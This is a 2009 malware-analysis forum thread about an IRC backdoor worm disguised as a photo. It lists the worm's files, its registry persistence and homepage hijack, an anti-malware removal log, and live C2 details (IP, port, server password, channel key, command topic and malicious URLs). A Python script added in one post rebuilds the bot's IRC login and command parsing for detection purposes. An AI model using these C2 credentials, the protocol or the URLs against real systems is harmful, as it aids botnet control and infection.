http://www.virustotal.com/analisis/d9c6247...910f5eb6ac1e533
Result: 3/38 (7.9%)
hxxp://hi5-album.com/foto.php?
#1
Posted 18 February 2009 - 07:51 PM
Trojan.Salmon moving to fish tank on reboot.
#2
Posted 18 February 2009 - 08:21 PM
Yup, this one's a lovely little worm/IRC backdoor....
Blogged it
It uses a picture icon and by default a user will not be able to see the .exe part of the filename (thanks, Windows) so they are more likely to be fooled into launching it:
(attached screenshot: 2.JPG, 11.19K)
Once launched it creates the following:
C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP
C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\TMP4351$.TMP
C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\rye.exe
Gives a fake error message so as not to arouse suspicion:
(attached screenshot: 1.jpeg, 2.96K)
Copies itself as winlogon.exe to C:\WINDOWS\winlogon.exe (not the real location of the genuine winlogon, which is in the system32 folder)
Adds an autorun entry to start itself with the PC:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ "Window UDP Control Servic" winlogon.exe
Then changes the IE homepage like so:
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Internet Explorer\Main\Start Page _http://www.postarticles.net
Also does a DNS lookup for the following site:
radiofm24.info DNS_TYPE_A Result: 216.87.167.7
And joins the IRC channel there, full of other bots, like so:
->216.87.167.7:4244 Nick: [00|USA|120106] Username: XP-4979 Server Pass: gooback Joined Channel: #!spr! with Password xole Channel Topic for Channel #!spr!: ".msn.stop|.msn.msg http://hi5-album.com/foto.php?=" Private Message to Channel #!spr!: "msn// Thread Activated: Sending Message." Private Message to Channel #!spr!: "msn// Thread Disabled."
Kind Regards,
Baz.
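The IRC join recorded above, replayed as an added example (not code from the thread or from the sandbox that produced the record). It parses the sandbox summary line into the C2 parameters, emits the client-side registration the bot would have to send (RFC 2812 framing; the USER mode and realname fields are assumed, since the capture only records the username), parses the server's topic reply (the 332 line is constructed) and splits the topic into the bot's orders using a '|'-separated '.command argument' grammar inferred from the one topic seen. It builds and parses text only and opens no connection.

```python
import re

# The sandbox's one-line summary quoted in the post above (constructed copy, not a live capture).
CAPTURE = ('->216.87.167.7:4244 Nick: [00|USA|120106] Username: XP-4979 '
           'Server Pass: gooback Joined Channel: #!spr! with Password xole '
           'Channel Topic for Channel #!spr!: '
           '".msn.stop|.msn.msg http://hi5-album.com/foto.php?="')

FIELD_RE = re.compile(
    r'->(?P<host>[\d.]+):(?P<port>\d+) Nick: (?P<nick>\S+) Username: (?P<user>\S+) '
    r'Server Pass: (?P<password>\S+) Joined Channel: (?P<channel>\S+) '
    r'with Password (?P<key>\S+) Channel Topic for Channel \S+: "(?P<topic>[^"]*)"')


def parse_capture(line):
    """Pull the C2 parameters out of the sandbox summary line."""
    m = FIELD_RE.search(line)
    if m is None:
        raise ValueError('unrecognised capture line')
    fields = m.groupdict()
    fields['port'] = int(fields['port'])
    return fields


def bot_registration(c):
    """Client-to-server lines that reproduce the captured join.

    PASS has to precede NICK/USER. The USER mode and realname fields ("0 *" and
    the username repeated) are assumed: the capture only records the username.
    """
    return [f"PASS {c['password']}",
            f"NICK {c['nick']}",
            f"USER {c['user']} 0 * :{c['user']}",
            f"JOIN {c['channel']} {c['key']}"]


def parse_irc_message(line):
    """Split one IRC line into (prefix, command, params); a trailing ':' param is kept whole."""
    prefix = None
    if line.startswith(':'):
        prefix, _, line = line[1:].partition(' ')
    head, sep, trailing = line.partition(' :')
    params = head.split()
    if sep:
        params.append(trailing)
    return prefix, params[0], params[1:]


def topic_from_rpl_topic(line):
    """Return the topic carried by a 332 (RPL_TOPIC) numeric, or None for any other message."""
    _, command, params = parse_irc_message(line)
    if command != '332' or len(params) < 3:
        return None
    return params[2]


def parse_topic_commands(topic):
    """The bot reads the topic as '|'-separated '.command [argument]' orders
    (grammar inferred from the single topic in the capture)."""
    commands = []
    for part in topic.split('|'):
        part = part.strip()
        if not part.startswith('.'):
            continue
        name, _, arg = part.partition(' ')
        commands.append((name, arg or None))
    return commands


def reconstruct_session(capture=CAPTURE):
    """Replay the exchange: '>' is bot to server, '<' is server to bot."""
    c = parse_capture(capture)
    exchange = [('>', line) for line in bot_registration(c)]
    # The server answers a successful JOIN with the channel topic (this line is constructed).
    rpl_topic = f":irc.example 332 {c['nick']} {c['channel']} :{c['topic']}"
    exchange.append(('<', rpl_topic))
    orders = parse_topic_commands(topic_from_rpl_topic(rpl_topic))
    # Status messages the capture shows the bot posting back into the channel.
    for status in ('msn// Thread Activated: Sending Message.', 'msn// Thread Disabled.'):
        exchange.append(('>', f"PRIVMSG {c['channel']} :{status}"))
    return c, orders, exchange


if __name__ == '__main__':
    c, orders, exchange = reconstruct_session()
    for direction, line in exchange:
        print(direction, line)
    print('orders:', orders)
```

The point of the replay is that the channel topic is the command channel: one /TOPIC change by the operator re-tasks every bot that joins, which is why the topic string (and the hi5-album.com URL inside it) is the thing worth alerting on, not just the server IP.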
#3
Posted 18 February 2009 - 08:40 PM
We didn't have the installer covered (will be added shortly), but the payload bot + load entry in <windows> are covered by a smart IPH rule and will be expunged with a fast scan.
#4
Posted 18 February 2009 - 08:43 PM
What about the homepage hijack, reckon that site is worth blacklisting?
Kind Regards,
Baz.
#5
Posted 18 February 2009 - 09:00 PM
Baz., on Feb 18 2009, 08:43 PM, said:
What about the homepage hijack, reckon that site is worth blacklisting?
Already there
Malwarebytes' Anti-Malware 1.34
Database version: 1775
Windows 5.1.2600 Service Pack 2
18/02/2009 20:54:30
mbam-log-2009-02-18 (20-54-30).txt
Scan type: Quick Scan
Objects scanned: 48896
Time elapsed: 1 minute(s), 50 second(s)
Memory Processes Infected: 1
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 1
Registry Data Items Infected: 1
Folders Infected: 0
Files Infected: 1
Memory Processes Infected:
C:\WINDOWS\winlogon.exe (Trojan.Agent) -> Unloaded process successfully.
Memory Modules Infected:
(No malicious items detected)
Registry Keys Infected:
(No malicious items detected)
Registry Values Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Window UDP Control Servic (Backdoor.Bot) -> Quarantined and deleted successfully.
Registry Data Items Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page (Hijack.Homepage) -> Bad: (http://www.postarticles.net) Good: (http://www.google.com/) -> Quarantined and deleted successfully.
Folders Infected:
(No malicious items detected)
Files Infected:
C:\WINDOWS\winlogon.exe (Backdoor.Bot) -> Delete on reboot.
#6
Posted 18 February 2009 - 09:09 PM
#7
Posted 05 April 2009 - 11:41 PM
Fatdcuk, on Feb 18 2009, 10:00 PM, said:
Already there
Malwarebytes' Anti-Malware 1.34
Database version: 1775
Windows 5.1.2600 Service Pack 2
18/02/2009 20:54:30
mbam-log-2009-02-18 (20-54-30).txt
Scan type: Quick Scan
Objects scanned: 48896
Time elapsed: 1 minute(s), 50 second(s)
Memory Processes Infected: 1
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 1
Registry Data Items Infected: 1
Folders Infected: 0
Files Infected: 1
Memory Processes Infected:
C:\WINDOWS\winlogon.exe (Trojan.Agent) -> Unloaded process successfully.
Memory Modules Infected:
(No malicious items detected)
Registry Keys Infected:
(No malicious items detected)
Registry Values Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Window UDP Control Servic (Backdoor.Bot) -> Quarantined and deleted successfully.
Registry Data Items Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page (Hijack.Homepage) -> Bad: (http://www.postarticles.net) Good: (http://www.google.com/) -> Quarantined and deleted successfully.
Folders Infected:
(No malicious items detected)
Files Infected:
C:\WINDOWS\winlogon.exe (Backdoor.Bot) -> Delete on reboot.